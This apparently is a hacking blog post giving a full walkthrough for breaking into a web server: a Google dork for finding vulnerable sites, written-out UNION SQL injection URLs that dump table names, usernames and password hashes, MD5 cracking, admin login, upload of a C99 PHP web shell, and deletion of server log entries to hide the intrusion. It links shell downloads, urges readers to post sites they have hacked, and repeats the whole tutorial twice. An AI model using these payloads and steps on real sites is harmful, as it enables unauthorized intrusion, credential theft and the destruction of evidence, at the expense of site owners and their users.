Advanced SQL Injection Part 1: Complete website rooting tutorial.......by Mishkat da Sykodevil.
Hi All,
In this tutorial we will be rooting a vulnerable web server using Mantra Browser. Its a long post that i've made. So have Patience to learn it considering my Patience to make it for you all. :D
What all you need
'''''''''''''''''''''''''''''''''''
1. PATIENCE, PATIENCE & PATIENCE :P
2. Mantra Browser (Best Browser For Hackers)
Download from here: http://www.getmantra.com/download/index.html
3. A Admin Finder Tool
Download from here: http://www.mediafire.com/?mryqnzewiky
4. Any PHP Shell you are comfortable with (my personal choice C99)
Download from here: http://www.sh3ll.org/
5. Google Dork to find SQLi Vulnerable sites:
allinurl:.php?id=
.
.
.
.
Now the process
'''''''''''''''''''''''''''''''
Step 1:
I'm on the home page of the website now
Code:
http://192.168.132.128/
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar1.jpg
Step 2:
I went through all the pages of web site and found a page with URL input
Code:
http://192.168.132.128/?id=13
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar2.jpg
Step 3:
I launched Hackbar by pressing F9
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar3.jpg
Step 4:
The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.
Code:
http://192.168.132.128/?id=13'
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar4.jpg
Since the page content is different from the previous one. I can make sure that the web page is vulnerable.
Step 5:
Lets find out the number of tables
Code:
http://192.168.132.128/?id=13 order by 1
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar6.jpg
Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage
Code:
http://192.168.132.128/?id=13 order by 7
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar7.jpg
Step 7:
I went up to 7 and no change till now
Code:
http://192.168.132.128/?id=13 order by 7
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar12.jpg
Step 8:
I'm on 8 now and I can see the page changed
Code:
http://192.168.132.128/?id=13 order by 8
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar13.jpg
Step 9:
Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar14.jpg
Step 10:
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar16.jpg
Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar19.jpg
Step 12:
I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar21.jpg
The current user is cms_user@localhost
Step 13:
Lets find out the version of the database. I replaced 2 in the URL with version() command
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar22.jpg
5.0.45 is the version
Step 14:
Let me list all the tables
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar23.jpg
From this list I found "user" is an interesting table
Step 15:
Now I listed all the columns and its a big list
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar24.jpg
Step 16:
I want columns from the table "user" and nothing else
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar25.jpg
Step 17:
Lets find the user name
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar27.jpg
Step 18:
Now, what about password
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar26.jpg
Its encrypted
Step 19:
Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar30.jpg
Step 20:
Voila.!!! I got the password
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar31.jpg
Step 21:
Finding the log in page. Its was right in front of me
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar32.jpg
NB: You can find it by Admin Finder tool kit that I've mentioned above. Just copy-paste the URL on Web Admin Finder v2.0 & Start searching.
Step 22:
Logging in with the credentials I have
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar33.jpg
Step 23:
Greetings.!!!
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar35.jpg
Step 24:
I'm an admin now. Look at my powers.
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar36.jpg
Step 25:
Let me add an event
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar37.jpg
Step 26:
and of course I want to upload a picture
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar38.jpg
Step 27:
Lets see it allows me to upload the shell or not
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar39.jpg
Step 28:
Now I'm pressing on "Add Event" button
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar40.jpg
Step 29:
Nice. Looks like it's got uploaded
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar41.jpg
Step 30:
Let's see where the shell got uploaded to
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar42.jpg
Step 31:
I'm trying to get the default upload location
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar43.jpg
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar44.jpg
Step 32:
Looks like I got it
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar45.jpg
Let me click on the c9shell.php file I just uploaded
Step 33:
Voila. I have shell access
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar46.jpg
Step 34:
I simply clicked on the up button to get the root folder
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar48.jpg
Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial
Step 35:
What I'm interested is the log folder
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar49.jpg
Step 36:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar51.jpg
Step 37:
Let me go back and edit the log file
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar52.jpg
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar53.jpg
Step 38:
I deleted complete log entries. Now saving it.
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar54.jpg
Step 39:
Nice. Log file is empty now
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar56.jpg
Step 40:
Now. Lets remove the c99 shell by pressing on Self Remove
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar57.jpg
Step 41:
Confirmed.!!!
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar58.jpg
Step 42:
OK. Good Bye C99
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar59.jpg
Step 43:
Well. It got deleted itself
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar60.jpg
So thats it for tonight. I hope all of you will be successful with this tutorial. Please submit your hacked site by Advanced SQL Injection under this post.
Happy Hacking.!!!
Thanks
P5YCH0D3V1L
In this tutorial we will be rooting a vulnerable web server using Mantra Browser. Its a long post that i've made. So have Patience to learn it considering my Patience to make it for you all. :D
What all you need
'''''''''''''''''''''''''''''''''''
1. PATIENCE, PATIENCE & PATIENCE :P
2. Mantra Browser (Best Browser For Hackers)
Download from here: http://www.getmantra.com/download/index.html
3. A Admin Finder Tool
Download from here: http://www.mediafire.com/?mryqnzewiky
4. Any PHP Shell you are comfortable with (my personal choice C99)
Download from here: http://www.sh3ll.org/
5. Google Dork to find SQLi Vulnerable sites:
allinurl:.php?id=
.
.
.
.
Now the process
'''''''''''''''''''''''''''''''
Step 1:
I'm on the home page of the website now
Code:
http://192.168.132.128/
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar1.jpg
Step 2:
I went through all the pages of web site and found a page with URL input
Code:
http://192.168.132.128/?id=13
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar2.jpg
Step 3:
I launched Hackbar by pressing F9
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar3.jpg
Step 4:
The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.
Code:
http://192.168.132.128/?id=13'
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar4.jpg
Since the page content is different from the previous one. I can make sure that the web page is vulnerable.
Step 5:
Lets find out the number of tables
Code:
http://192.168.132.128/?id=13 order by 1
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar6.jpg
Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage
Code:
http://192.168.132.128/?id=13 order by 7
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar7.jpg
Step 7:
I went up to 7 and no change till now
Code:
http://192.168.132.128/?id=13 order by 7
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar12.jpg
Step 8:
I'm on 8 now and I can see the page changed
Code:
http://192.168.132.128/?id=13 order by 8
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar13.jpg
Step 9:
Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar14.jpg
Step 10:
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar16.jpg
Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar19.jpg
Step 12:
I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar21.jpg
The current user is cms_user@localhost
Step 13:
Lets find out the version of the database. I replaced 2 in the URL with version() command
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar22.jpg
5.0.45 is the version
Step 14:
Let me list all the tables
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar23.jpg
From this list I found "user" is an interesting table
Step 15:
Now I listed all the columns and its a big list
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar24.jpg
Step 16:
I want columns from the table "user" and nothing else
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar25.jpg
Step 17:
Lets find the user name
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar27.jpg
Step 18:
Now, what about password
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar26.jpg
Its encrypted
Step 19:
Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar30.jpg
Step 20:
Voila.!!! I got the password
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar31.jpg
Step 21:
Finding the log in page. Its was right in front of me
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar32.jpg
NB: You can find it by Admin Finder tool kit that I've mentioned above. Just copy-paste the URL on Web Admin Finder v2.0 & Start searching.
Step 22:
Logging in with the credentials I have
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar33.jpg
Step 23:
Greetings.!!!
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar35.jpg
Step 24:
I'm an admin now. Look at my powers.
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar36.jpg
Step 25:
Let me add an event
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar37.jpg
Step 26:
and of course I want to upload a picture
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar38.jpg
Step 27:
Lets see it allows me to upload the shell or not
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar39.jpg
Step 28:
Now I'm pressing on "Add Event" button
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar40.jpg
Step 29:
Nice. Looks like it's got uploaded
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar41.jpg
Step 30:
Let's see where the shell got uploaded to
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar42.jpg
Step 31:
I'm trying to get the default upload location
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar43.jpg
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar44.jpg
Step 32:
Looks like I got it
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar45.jpg
Let me click on the c9shell.php file I just uploaded
Step 33:
Voila. I have shell access
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar46.jpg
Step 34:
I simply clicked on the up button to get the root folder
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar48.jpg
Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial
Step 35:
What I'm interested is the log folder
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar49.jpg
Step 36:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar51.jpg
Step 37:
Let me go back and edit the log file
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar52.jpg
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar53.jpg
Step 38:
I deleted complete log entries. Now saving it.
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar54.jpg
Step 39:
Nice. Log file is empty now
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar56.jpg
Step 40:
Now. Lets remove the c99 shell by pressing on Self Remove
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar57.jpg
Step 41:
Confirmed.!!!
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar58.jpg
Step 42:
OK. Good Bye C99
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar59.jpg
Step 43:
Well. It got deleted itself
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar60.jpg
So thats it for tonight. I hope all of you will be successful with this tutorial. Please submit your hacked site by Advanced SQL Injection under this post.
Happy Hacking.!!!
Thanks
P5YCH0D3V1L
No comments:
Post a Comment